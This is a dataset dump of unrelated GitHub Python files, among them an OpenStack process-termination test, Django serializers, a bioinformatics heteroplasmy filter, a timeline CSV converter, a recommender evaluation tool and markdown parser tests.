self.assertFalse(workers, 'OS processes left %r' % workers)\n\n def test_terminate_sigkill(self):\n self._terminate_with_signal(signal.SIGKILL)\n status = self._reap_test()\n self.assertTrue(os.WIFSIGNALED(status))\n self.assertEqual(os.WTERMSIG(status), signal.SIGKILL)\n\n def test_terminate_sigterm(self):\n self._terminate_with_signal(signal.SIGTERM)\n status = self._reap_test()\n self.assertTrue(os.WIFEXITED(status))\n self.assertEqual(os.WEXITSTATUS(status), 
0)\n","repo_name":"JiYou/openstack","sub_path":"packages/source/nova/nova/tests/integrated/test_multiprocess_api.py","file_name":"test_multiprocess_api.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","stars":399,"dataset":"github-code","pt":"34"} +{"seq_id":"71895350817","text":"import json\n\n\nclass Book:\n\n def __init__(self):\n pass\n\n def appendbook(self, author, title, country, image_link, link, number_of_pages, language, year):\n with open('books.json', 'r') as json_file:\n data = json.load(json_file)\n dictionary = {\n \"author\": author,\n \"available\": True,\n \"country\": country,\n \"imageLink\": image_link,\n \"language\": language,\n \"link\": link + \"\\n\",\n \"pages\": number_of_pages,\n \"title\": title,\n \"year\": year\n }\n new_data = data\n new_data.append(dictionary)\n json_file.close()\n outfile = open('books.json', \"w\")\n outfile.write(\"\")\n outfile.write(json.dumps(new_data, indent=4, sort_keys=True))\n outfile.close()\n \n def searchbook(self, book):\n with open('books.json', 'r') as json_file:\n data = json.load(json_file)\n s1 = ''\n Userinput = book\n for d in data:\n data_string = str(d)\n lowercased_object = data_string.lower()\n lowercased_input = Userinput.lower()\n splitted_input = lowercased_input.split()\n for values in splitted_input:\n if values in lowercased_object:\n s = d[\"author\"] + \", \" + str(d[\"available\"]) + \", \" + d[\"country\"] + \", \" + d[\"imageLink\"] + \", \" + d[\"language\"] + \", \" + d[\"link\"] + \", \" + str(d[\"pages\"]) + \", \" + d[\"title\"] + \" and \" + str(d[\"year\"]) + \"\\n\" + \"----------------------------------------------------------------------------\" + \"\\n\"\n if s in s1:\n pass\n else:\n s1 = s1 + s\n print(s1)\n","repo_name":"Bramgus12/Analyse3","sub_path":"book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3452190732","text":"from moviepy.editor import *\nfrom moviepy.video.tools.subtitles import SubtitlesClip\n\ngenerator = lambda txt: TextClip(txt, font='Arial', fontsize=24, color='black')\n\nf = open('enresult.txt', 'r', encoding='utf-8')\nLines = f.readlines()\n\nsubs = []\ncount = 0\nfor line in Lines:\n subs.append(((count, count + 10), line))\n count+=10\n\nsubtitles = SubtitlesClip(subs, generator)\n\nvideo = VideoFileClip(\"demo.mp4\")\nresult = CompositeVideoClip([video, subtitles.set_pos(('center','bottom'))])\n\nresult.write_videofile(\"output.mp4\")\n","repo_name":"pmkd42/Subtitle_Generator-Regional_Languages","sub_path":"jaatre!!/app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15807169654","text":"import uuid\n\nfrom common.utils import time_stamp_hex_generator\nfrom rest_framework import serializers\n\nfrom schools import models\n\n\nclass SchoolSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.School\n fields = [\"id\", \"name\", \"max_student\"]\n\n\nclass StudentSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.Student\n fields = [\"id\", \"student_id\", \"firstname\", \"lastname\", \"school\"]\n read_only_fields = [\"student_id\"]\n\n def school_is_full(self, target_school):\n students = models.Student.objects.filter(school=target_school).count()\n if students >= target_school.max_student:\n return True\n return False\n\n 
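# capacity is enforced at create time below; note the count-then-save is not atomic, so concurrent requests could overfill a school (assuming no extra DB-level guard exists)\n    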
def create(self, validated_data):\n if self.school_is_full(validated_data[\"school\"]):\n raise serializers.ValidationError(\n {\"school\": [\"The school is already full\"]}\n )\n\n student = models.Student(\n firstname=validated_data[\"firstname\"],\n lastname=validated_data[\"lastname\"],\n school=validated_data[\"school\"],\n )\n student.student_id = time_stamp_hex_generator()\n student.save()\n return student\n","repo_name":"n-permana/api_school_and_student","sub_path":"app/schools/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71491807778","text":"# Create a set of vocabularies\n# Qian Yang (yang-qian@github, yangqian@cmu.edu)\n## OUTPUT: poems.json\n## Schema: text, topic, sentimen (pos,neg,compo)\n\n\n#import os.path, time\n#print(\"===\\nCreated by: Qian Yang\")\n#print(\"last modified: %s\" % time.ctime(os.path.getmtime(os.path.abspath(__file__))),'\\n===')\n\nfrom semantics import *\nimport csv,json\nimport pandas as pd\n\n\n# ======== POEMS from poetryfuncation.org ======== #\n\npoems_dict = {}\n\nwith open('poems-from-poetryfoundation-org.csv', 'r', encoding = 'utf-8') as fin:\n reader = csv.reader(fin)\n # print(next(reader)) # ignore old header\n\n for row in reader:\n author, content, name, age, _type = row\n \n # break down content into sentences\n for line in content.split('.'):\n line += '.'\n pos, neg, neu, compound = poem_sentiment(line)\n poems_dict[line.lstrip()] = {'poem name': name ,\n 'type': _type,\n 'pos': pos,\n 'neg': neg,\n 'neu': neu,\n 'compound': compound}\n\nprint(poems_dict)\n# write into json file\nwith open('poems.json', 'w') as fp:\n json.dump(poems_dict, fp)\n\nastro = pd.read_csv(\"poetastrologers_cleaned_tweets.csv\",\n header = None,\n names = ['content'])\n\n#poem_sentiment(poems)\n","repo_name":"yang-qian/Alternative-Alexa","sub_path":"vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15507299303","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 5 11:10:48 2016\n\n@author: RJovelin\n\"\"\"\n\n# use this function to filter out positions that are variable in tumor and in normal sample\n# Precondition: sites have been filtered between RNA and DNA and only RNA-specific sites are reported in summary files\n\nimport os\nimport sys\nfrom mito_mutations import *\n\n# usage python Filter_TumorNormal_Heteroplasmies.py options\n# - Tumor_RNAspecific_summary_file: summary file with RNA-specific heteroplasmies in tumor\n# - Normal_RNAspecific_summary_file: sumary file with RNA-specific heteroplasmies in normal\n# - minimum_coverage: minimum read depth to keep positions \n\n\n# get the Tumor summary file\nSummaryTumor = sys.argv[1]\n# get the Normal summary file\nSummaryNormal = sys.argv[2]\n# get the folder with mitoseek RNA outputs for normal sample\n# get the minimum read depth\nminimum_coverage = int(sys.argv[3])\n# get the outputfile name\n\n\n\n# parse the summary files into a dict of dict {participantID: {position : [information]} \n# remove participants without tumor and normal data\n# remove positions with RNA-tumor variants that have no coverage (or less than threshold) in normal-tumor\n# correct sample size at each position\n\ncancer_name = SummaryTumor[SummaryTumor.index('Summary_') + len('Summary_') : SummaryTumor.index('tumor') -1]\nassert 
cancer_name == SummaryNormal[SummaryNormal.index('Summary_') + len('Summary_') : SummaryNormal.index('normal') -1], 'cancer names do not match'\n\n# verify that arguments are passed appropriately\nassert 'tumor' in SummaryTumor and 'normal' in SummaryNormal, 'summary files should be tumor and normal'\nprint('QCed files matching')\n\n# build outputfile with comand option arguments\noutputfile = 'HeteroplasmySummary_' + cancer_name + '_TumorSpecific.txt'\n\n# parse the summary files into a dict of dict {participantID: {position : [information]} \nTumor_snps = GetVariablePositions(SummaryTumor)\nNormal_snps = GetVariablePositions(SummaryNormal)\nprint('Tumor_snps', len(Tumor_snps))\nprint('Normal_snps', len(Normal_snps))\n\n# remove participants not in Tumor and Normal\nTumor_snps, Normal_snps = RemoveUniqueParticipants(Tumor_snps, Normal_snps)\nprint('N individuals in Tumor after removing unique participants', len(Tumor_snps))\n\nprint(os.getcwd())\n# move to directory containing the subfolders of the mitoseek RNA Normal outputs\nos.chdir('NT_RNASeq/')\nprint(os.getcwd())\n\n# remove positions with RNA variants that have not enough coverage in Normal RNA\nTumor_snps = RemovePositionWithoutCoverage(Tumor_snps, '_NT_RNASEQ', minimum_coverage)\nprint('N individuals in Tumor after removing positions without sufficient coverage', len(Tumor_snps))\n\n# move to the directory containing the subfolders of the mitoseek RNA outputs\nos.chdir('../TP_RNASeq/')\nprint(os.getcwd())\n\n# correct sample size at each position\n# get the sample size of individuals with RNAseq and WGS that have minimum coverage in RNA at each position\n# make a list of subfolders from RNA mitoseek outputs\nRNASubFolders = [i for i in os.listdir('./')]\nto_delete = []\nfor i in RNASubFolders:\n try:\n os.listdir(i)\n except:\n to_delete.append(i)\n else:\n if i[:i.index('_TP_RNASEQ')] not in Tumor_snps:\n to_delete.append(i)\nfor i in to_delete:\n RNASubFolders.remove(i)\n# create a dict with position 0-based {position: number of indidivuals} \nsample = {}\n# loop over directories\nfor subfolder in RNASubFolders:\n # get basecall file\n infile = open(subfolder + '/' + 'mito1_basecall.txt', 'r')\n # skip header\n infile.readline()\n # loop over file\n for line in infile:\n line = line.rstrip()\n if line != '':\n line = line.split('\\t')\n # get position 0-based\n position = int(line[1]) - 1\n # compute coverage\n reads = sum(list(map(lambda x: int(x), line[3:])))\n assert type(reads) == int, \"reads should be an integer\"\n # do not consider positions with read depth < minimum\n if reads > minimum_coverage:\n # update dict with count\n sample[position] = sample.get(position, 0) + 1\n infile.close()\n# loop over participant\nfor ID in Tumor_snps:\n # loop over position\n for position in Tumor_snps[ID]:\n # get the sample size\n Tumor_snps[ID][position][11] = str(sample[position])\n\n# filter variants observed in Normal RNA from Tumor RNA variants\n# loop over participants in Tumor\nfor participant in Tumor_snps:\n # create a list of positions to remove\n to_delete = []\n # loop over positions\n for position in Tumor_snps[participant]:\n # check if position is recorded in WGS\n if position in Normal_snps[participant]:\n # remove variable positions regardless of the variants themselves\n to_delete.append(position)\n print('delete {0} positions in {1}'.format(len(to_delete), participant))\n if len(to_delete) != 0:\n for position in to_delete:\n del Tumor_snps[participant][position]\n\n# remove participants with no variants\nto_delete 
= [i for i in Tumor_snps if len(Tumor_snps[i]) == 0]\nprint('delete {0} individuals'.format(len(to_delete)))\nfor i in to_delete:\n del Tumor_snps[i]\nprint('N individual in tumor after filtering variants in Normal', len(Tumor_snps))\n\n\n# create a dict with position as key and list of lists with info for all participants\n# {position : [[information_ID1], [information_ID2]}\nRNA_variants = {}\nfor ID in Tumor_snps:\n # get positions\n for position in Tumor_snps[ID]:\n if position in RNA_variants:\n RNA_variants[position].append(Tumor_snps[ID][position])\n else:\n RNA_variants[position] = [Tumor_snps[ID][position]]\n# create a list of positions\npositions = [i for i in RNA_variants]\npositions.sort()\n\n# move to parent directory in which the script was launched\nos.chdir('../')\n\n# open file for writing\nnewfile = open(outputfile, 'w')\n# write header to file\nheader = ['Position', 'Participant', 'Gene', 'Orientation', 'Exon_effect',\n 'AA_change', 'Reference', 'Major', 'Minor', 'Major_count', 'Minor_count',\n 'Sample_size', 'Forward_A', 'Forward_T', 'Forward_C', 'Forward_G', \n 'Reverse_A', 'REverse_T', 'Reverse_C', 'Reverse_G', 'FisherPval']\nnewfile.write('\\t'.join(header) + '\\n')\n\n# loop over positions\nfor i in positions:\n # loop over each SNP at that position for all participants\n for j in RNA_variants[i]:\n # write info to file, has already position 1-based and participant ID\n newfile.write('\\t'.join(j) + '\\n')\n\nnewfile.close()\n\n","repo_name":"rjovelin/MitoVariants","sub_path":"Filter_TumorNormal_Heteroplasmies.py","file_name":"Filter_TumorNormal_Heteroplasmies.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17708883985","text":" # Convert google doc spreadsheet format for timelinejs to json file\r\n# useful if you want to experiment using google doc but eventually\r\n# host everything yourself privately.\r\n\r\n# Example: go to google docs spreadsheet and do File -> Download As -> CSV (Comma Separated Values)\r\n# save as timeline.csv, run this, you get a timeline.json out\r\n#\r\n# Or look at your google doc ID long string like for example 1xTn9OSdmnxbBtQcKxZYV-xXkKoOpPSu6AUT0LXXszHo\r\n# wget -qO timeline.csv 'https://docs.google.com/spreadsheets/d/1xTn9OSdmnxbBtQcKxZYV-xXkKoOpPSu6AUT0LXXszHo/pub?output=csv'\r\n\r\nimport csv\r\nimport json\r\n\r\ncsvfile = open('timeline_data.csv', newline='', encoding='utf8')\r\noutfile = open('timeline_data.js', 'w', newline='')\r\nreader = csv.DictReader(csvfile)\r\n\r\ndata = {}\r\nevents = []\r\n#eras = []\r\ndata['events'] = events\r\n#data['eras'] = eras\r\n\r\nMONTHS = 12 # amount of max months in a year\r\nDAYS = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\r\n\r\n\r\n# def check_event(event):\r\n# assert int(event['start_date']['year']) # check every event has start year\r\n# if int(event['start_date']['year']) > 6000:\r\n# print(\"Warning: An event has year > 6000\" + event['end_date']['year'])\r\n# if int(event['start_date']['year']) < -6000:\r\n# print(\"Warning: An event has year < -6000\" + event['end_date']['year'])\r\n# # unlike spec says, headline IS required, else JSON cannot load\r\n# assert 'text' in event, \"Event has no headline: \" + event['start_date']['year']\r\n# assert 'headline' in event['text'], \"Event has no headline\" + event['start_date']['year']\r\n# if 'month' in event['start_date']:\r\n# check_month(int(event['start_date']['month']))\r\n# if 'day' in event['start_date']:\r\n# assert 
'month' in event['start_date'], \"event with start_day but no start_month\"\r\n# check_day(int(event['start_date']['month']), int(event['start_date']['day']))\r\n# if 'end_date' in event:\r\n# if int(event['end_date']['year']) > 6000:\r\n# print(\"Warning: An event has year > 6000\" + event['end_date']['year'])\r\n# if int(event['end_date']['year']) < -6000:\r\n# print(\"Warning: An event has year < -6000: \" + event['end_date']['year'])\r\n# if 'month' in event['end_date']:\r\n# check_month(int(event['end_date']['month']))\r\n# if 'day' in event['end_date']:\r\n# assert 'month' in event['end_date'], \"event with end_day but no end_month\"\r\n# check_day(int(event['end_date']['month']), int(event['end_date']['day']))\r\n\r\n\r\ndef check_month(month):\r\n assert month < 13, \"event with month > 12: \" + str(month)\r\n assert month > 0, \"event with month < 1: \" + str(month)\r\n\r\n\r\ndef check_day(month, day):\r\n assert day > 0\r\n assert day <= DAYS[month-1], \"event with day not in month: \" + str(month) + \" \" + str(day)\r\n\r\n\r\n# Didn't support 'End Time': '', 'Time': ''\r\nkeymap = {'Media': 'mediaUrl', 'Media Caption': 'mediaCaption', 'Media Thumbnail': 'mediaThumbnail',\r\n 'Month': 'start_date_month', 'Day': 'start_date_day', 'Year': 'start_date_year',\r\n 'End Month': 'end_date_month', 'End Day': 'end_date_day', 'End Year': 'end_date_year',\r\n 'Headline': 'text_headline', 'Text': 'text_text',\r\n 'Group': 'group', 'Display Date': 'display_date', 'Period': 'period'}\r\n\r\nmonthmap = {'january': 1, 'february': 2, 'march': 3, 'april': 4, 'may': 5, 'june':6, 'july': 7, 'august': 8,\r\n 'september': 9, 'october': 10, 'november': 11, 'december': 12}\r\n\r\noutfile.write(\"let timelineData = [\\n\")\r\n\r\n\r\ndef escape(param):\r\n string = json.dumps(param)\r\n string = string.replace(\"'\", \"\\\\'\")\r\n # print(string)\r\n return string\r\n\r\n\r\nfor row in reader:\r\n outfile.write(\"{\\n\")\r\n event = {}\r\n for a in keymap:\r\n # print(\"Newline? 
\\n\")\r\n if row[a]:\r\n if keymap[a] == 'start_date_month' or keymap[a] == 'end_date_month':\r\n if row[a] in monthmap:\r\n outfile.write(keymap[a] + \" : \\\"\" + escape(monthmap[row[a]]) + \"\\\" ,\\n\")\r\n else:\r\n outfile.write(keymap[a] + \" : \" + escape(row[a]) + \" ,\\n\")\r\n if '|' in keymap[a]:\r\n #\r\n (x, y)= keymap[a].split(\"|\")\r\n if not x in event: event[x] = {}\r\n event[x][y] = row[a]\r\n else:\r\n event[keymap[a]] = row[a]\r\n\r\n outfile.write(\"},\\n\")\r\n# print(events)\r\noutfile.write(\"];\")\r\n\r\n#json.dump(events, outfile, sort_keys=True, indent=4)\r\n\r\n","repo_name":"fedorbeets/Chronology","sub_path":"data/timeline_data_csv_to_js.py","file_name":"timeline_data_csv_to_js.py","file_ext":"py","file_size_in_byte":4529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32193767462","text":"#!/usr/bin/python3\n\nfrom typing import List #class\nfrom typing import Dict #class\n\nfrom evaluationTool.aEvalTool import AEvalTool #class\n\nfrom pandas.core.frame import DataFrame #class\nfrom pandas.core.frame import Series #class\n\nimport numpy as np\n\nclass EvalToolDHondtBanditVotes(AEvalTool):\n def __init__(self, argumentsDict:Dict[str,object]):\n if type(argumentsDict) is not dict:\n raise ValueError(\"Argument argumentsDict isn't type dict.\")\n\n def click(self, userID:int, rItemIDsWithResponsibility:List, clickedItemID:int, portfolioModel:DataFrame, argumentsDict:Dict[str,object]):\n if type(userID) is not int and type(userID) is not np.int64:\n raise ValueError(\"Argument userID isn't type int.\")\n if type(rItemIDsWithResponsibility) is not list:\n raise ValueError(\"Argument rItemIDsWithResponsibility isn't type list.\")\n #if type(clickedItemID) is not int and type(clickedItemID) is not np.int64:\n # raise ValueError(\"Argument clickedItemID isn't type int.\")\n if not isinstance(portfolioModel, DataFrame):\n raise ValueError(\"Argument pModelDF isn't type DataFrame.\")\n if list(portfolioModel.columns) != ['r', 'n', 'alpha0', 'beta0']:\n raise ValueError(\"Argument pModelDF doen't contain rights columns.\")\n if type(argumentsDict) is not dict:\n raise ValueError(\"Argument argumentsDict isn't type dict.\")\n\n aggrItemIDsWithRespDF:DataFrame = DataFrame(rItemIDsWithResponsibility, columns=[\"itemId\", \"responsibility\"])\n aggrItemIDsWithRespDF.set_index(\"itemId\", inplace=True)\n\n #EvalToolDHont.linearNormalizingPortfolioModelDHont(portfolioModel)\n\n #evaluationDict[AEvalTool.CLICKS] = evaluationDict.get(AEvalTool.CLICKS, 0) + 1\n\n # responsibilityDict:dict[methodID:str, votes:float]\n responsibilityDict:dict[str, float] = aggrItemIDsWithRespDF.loc[clickedItemID][\"responsibility\"]\n\n # increment portfolio model\n for methodIdI in responsibilityDict.keys():\n rowI:Series = portfolioModel.loc[methodIdI]\n rowI['r'] += responsibilityDict[methodIdI]\n #rowI['n'] += 1 - responsibilityDict[methodIdI]\n #relevance_this = responsibilityDict[methodIdI]\n #relevance_others = sumMethodsVotes - relevance_this\n #update_step = self.learningRateClicks * (relevance_this - relevance_others)\n # elif action == \"storeViews\":\n # update_step = -1 * learningRateViews * (relevance_this - relevance_others)\n # pos_step = 0\n #portfolioModel.loc[methodIdI] = portfolioModel.loc[methodIdI] + update_step\n # Apply constraints on maximal and minimal volumes of votes\n #if portfolioModel.loc[methodIdI, 'votes'] < self.minVotesConst:\n # portfolioModel.loc[methodIdI, 'votes'] = self.minVotesConst\n #elif 
portfolioModel.loc[methodIdI, 'votes'] > self.maxVotesConst:\n # portfolioModel.loc[methodIdI, 'votes'] = self.maxVotesConst\n\n # linearly normalizing to unit sum of votes\n #EvalToolDHont.linearNormalizingPortfolioModelDHont(portfolioModel)\n\n print(\"HOP\")\n print(\"clickedItemID: \" + str(clickedItemID))\n print(portfolioModel)\n\n def displayed(self, userID:int, rItemIDsWithResponsibility:List, portfolioModel:DataFrame, argumentsDict:Dict[str,object]):\n if type(userID) is not int and type(userID) is not np.int64:\n raise ValueError(\"Argument userID isn't type int.\")\n if type(rItemIDsWithResponsibility) is not list:\n raise ValueError(\"Argument rItemIDsWithResponsibility isn't type list.\")\n if not isinstance(portfolioModel, DataFrame):\n raise ValueError(\"Argument pModelDF isn't type DataFrame.\")\n if list(portfolioModel.columns) != ['r', 'n', 'alpha0', 'beta0']:\n raise ValueError(\"Argument pModelDF doen't contain rights columns.\")\n if type(argumentsDict) is not dict:\n raise ValueError(\"Argument argumentsDict isn't type dict.\")\n\n aggrItemIDsWithRespDF:DataFrame = DataFrame(rItemIDsWithResponsibility, columns=[\"itemId\", \"responsibility\"])\n aggrItemIDsWithRespDF.set_index(\"itemId\", inplace=True)\n\n # responsibilityDict:dict[methodID:str, votes:float]\n # iterate over all recommended items, penalize their methods\n for index, responsibilityI in aggrItemIDsWithRespDF.iterrows():\n responsibilityDict:dict[str,float] = responsibilityI[\"responsibility\"]\n\n # increment portfolio model\n for methodIdI in responsibilityDict.keys():\n relevance_this:float = responsibilityDict.get(methodIdI)\n portfolioModel.loc[methodIdI]['n'] += relevance_this \n","repo_name":"sbalcar/HeterRecomPortfolio","sub_path":"src/evaluationTool/evalToolDHondtBanditVotes.py","file_name":"evalToolDHondtBanditVotes.py","file_ext":"py","file_size_in_byte":4825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25642016782","text":"#---------------------------------------------\n# Terminal output functions\n#---------------------------------------------\nfrom src.param import param_edge\n\nimport time\n\n\ndef addLog(type, message):\n if(type == \"#\"):\n print(\"[\\033[1;34m#\\033[0m] \"+ message)\n elif(type == \"OK\"):\n print(\"[\\033[1;32mOK\\033[0m] \"+ message)\n elif(type == \"error\"):\n print(\"[\\033[1;31merror\\033[0m] \"+ message)\n elif(type == \"com\"):\n print(\"[\\033[1;30mPOST\\033[0m] \"+ message)\n time.sleep(param_edge.tic_message)\n\ndef addConnection(dest, state):\n if(dest == \"edge\"):\n dest = \"Edge AI module\"\n elif(dest == \"capture\"):\n dest = \"Train module\"\n elif(dest == \"processing\"):\n dest = \"Data processing component\"\n elif(dest == \"component_ai\"):\n dest = \"AI component\"\n\n if(state == \"on\"):\n print(\"[\\033[1;36mCON\\033[0m] Connection \\033[1;32mON\\033[0m - \"+ dest)\n elif(state == \"off\"):\n print(\"[\\033[1;36mCON\\033[0m] Connection \\033[1;31mOFF\\033[0m - \"+ dest)\n\ndef addPost(dest, c1, c2, c3):\n if(dest == \"edge\"):\n message = \"Received [%s, %s, %s]\"%(c1, c2, c3)\n else:\n message = \"To %s [%s, %s, %s]\"%(dest, c1, c2, c3)\n\n print(\"[\\033[1;30mPOST\\033[0m] \" + message)\n time.sleep(param_edge.tic_message)\n\ndef addDaemon(type, status, message):\n if(type == \"#\"):\n print(\"[\\033[1;34m#\\033[0m] Daemon \", flush=True, end='')\n elif(type == \"OK\"):\n print(\"[\\033[1;32mOK\\033[0m] Daemon \", flush=True, end='')\n elif(type == \"error\"):\n 
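# \033[1;31m renders the daemon label in bold red on ANSI-capable terminals\n        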
print(\"[\\033[1;31merror\\033[0m] Daemon \", flush=True, end='')\n\n if(status == \"ON\"):\n print(\"\\033[1;32m\"+status+\"\\033[0m - \"+message)\n elif(status == \"OFF\"):\n print(\"\\033[1;31m\"+status+\"\\033[0m - \"+message)\n\n time.sleep(param_edge.tic_message)\n\ndef addLine():\n print(\"\")\n\ndef shutdown():\n addLine()\n addLine()\n print(\"[\\033[1;32mOK\\033[0m] Program shutdown ...\",)\n\ndef delai():\n print(\"[\\033[1;34m#\\033[0m] Daemon closing\", flush=True, end='')\n print(\"...2\", flush=True, end='')\n time.sleep(1)\n print(\"...1\", flush=True)\n time.sleep(1)\n\ndef fatal_error():\n print(\"\\033[1;31m--- Fatal error ---\\033[0m\")\n","repo_name":"nsviel/-Obstacle-Edge_orchestrator_component","sub_path":"src/utils/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72777910816","text":"\"\"\"\nhttps://github.github.com/gfm/#thematic-breaks\n\"\"\"\nfrom test.utils import act_and_assert\n\nimport pytest\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_013():\n \"\"\"\n Test case 013: A line consisting of 0-3 spaces of indentation, followed by a sequence of three or more matching -, _, or * characters, each followed optionally by any number of spaces or tabs, forms a thematic break.\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"***\n---\n___\"\"\"\n expected_tokens = [\n \"[tbreak(1,1):*::***]\",\n \"[tbreak(2,1):-::---]\",\n \"[tbreak(3,1):_::___]\",\n ]\n expected_gfm = \"\"\"
<hr />\n<hr />\n<hr />\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_014():\n    \"\"\"\n    Test case 014: (part a) Wrong characters:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\"+++\"\"\"\n    expected_tokens = [\"[para(1,1):]\", \"[text(1,1):+++:]\", \"[end-para:::True]\"]\n    expected_gfm = \"\"\"<p>+++</p>\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_015():\n    \"\"\"\n    Test case 015: (part b) Wrong characters:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\"===\"\"\"\n    expected_tokens = [\"[para(1,1):]\", \"[text(1,1):===:]\", \"[end-para:::True]\"]\n    expected_gfm = \"\"\"<p>===</p>\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_016():\n    \"\"\"\n    Test case 016: Not enough characters:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\"--\n**\n__\"\"\"\n    expected_tokens = [\n        \"[para(1,1):\\n\\n]\",\n        \"[text(1,1):--\\n::\\n]\",\n        \"[text(2,1):**:]\",\n        \"[text(2,3):\\n::\\n]\",\n        \"[text(3,1):__:]\",\n        \"[end-para:::True]\",\n    ]\n    expected_gfm = \"\"\"<p>--\n**\n__</p>\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_017():\n    \"\"\"\n    Test case 017: One to three spaces indent are allowed:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\" ***\n  ***\n   ***\"\"\"\n    expected_tokens = [\n        \"[tbreak(1,2):*: :***]\",\n        \"[tbreak(2,3):*:  :***]\",\n        \"[tbreak(3,4):*:   :***]\",\n    ]\n    expected_gfm = \"\"\"<hr />\n<hr />\n<hr />\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_018():\n    \"\"\"\n    Test case 018: (part a) Four spaces is too many:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\"    ***\"\"\"\n    expected_tokens = [\n        \"[icode-block(1,5):    :]\",\n        \"[text(1,5):***:]\",\n        \"[end-icode-block:::True]\",\n    ]\n    expected_gfm = \"\"\"<pre><code>***\n</code></pre>\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_019():\n    \"\"\"\n    Test case 019: (part b) Four spaces is too many:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\"Foo\n    ***\"\"\"\n    expected_tokens = [\n        \"[para(1,1):\\n    ]\",\n        \"[text(1,1):Foo\\n::\\n]\",\n        \"[text(2,5):***:]\",\n        \"[end-para:::True]\",\n    ]\n    expected_gfm = \"\"\"<p>Foo\n***</p>\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_020():\n    \"\"\"\n    Test case 020: More than three characters may be used:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\"_____________________________________\"\"\"\n    expected_tokens = [\"[tbreak(1,1):_::_____________________________________]\"]\n    expected_gfm = \"\"\"<hr />\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_021():\n    \"\"\"\n    Test case 021: (part a) Spaces are allowed between the characters:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\" - - -\"\"\"\n    expected_tokens = [\"[tbreak(1,2):-: :- - -]\"]\n    expected_gfm = \"\"\"<hr />\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_022():\n    \"\"\"\n    Test case 022: (part b) Spaces are allowed between the characters:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\" ** * ** * ** * **\"\"\"\n    expected_tokens = [\"[tbreak(1,2):*: :** * ** * ** * **]\"]\n    expected_gfm = \"\"\"<hr />\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_023():\n    \"\"\"\n    Test case 023: (part c) Spaces are allowed between the characters:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\"- - - -\"\"\"\n    expected_tokens = [\"[tbreak(1,1):-::- - - -]\"]\n    expected_gfm = \"\"\"<hr />\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_024():\n    \"\"\"\n    Test case 024: Spaces are allowed at the end:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\"- - - - \"\"\"\n    expected_tokens = [\"[tbreak(1,1):-::- - - - ]\"]\n    expected_gfm = \"\"\"<hr />\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_025():\n    \"\"\"\n    Test case 025: However, no other characters may occur in the line:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\"_ _ _ _ a\n\na------\n\n---a---\"\"\"\n    expected_tokens = [\n        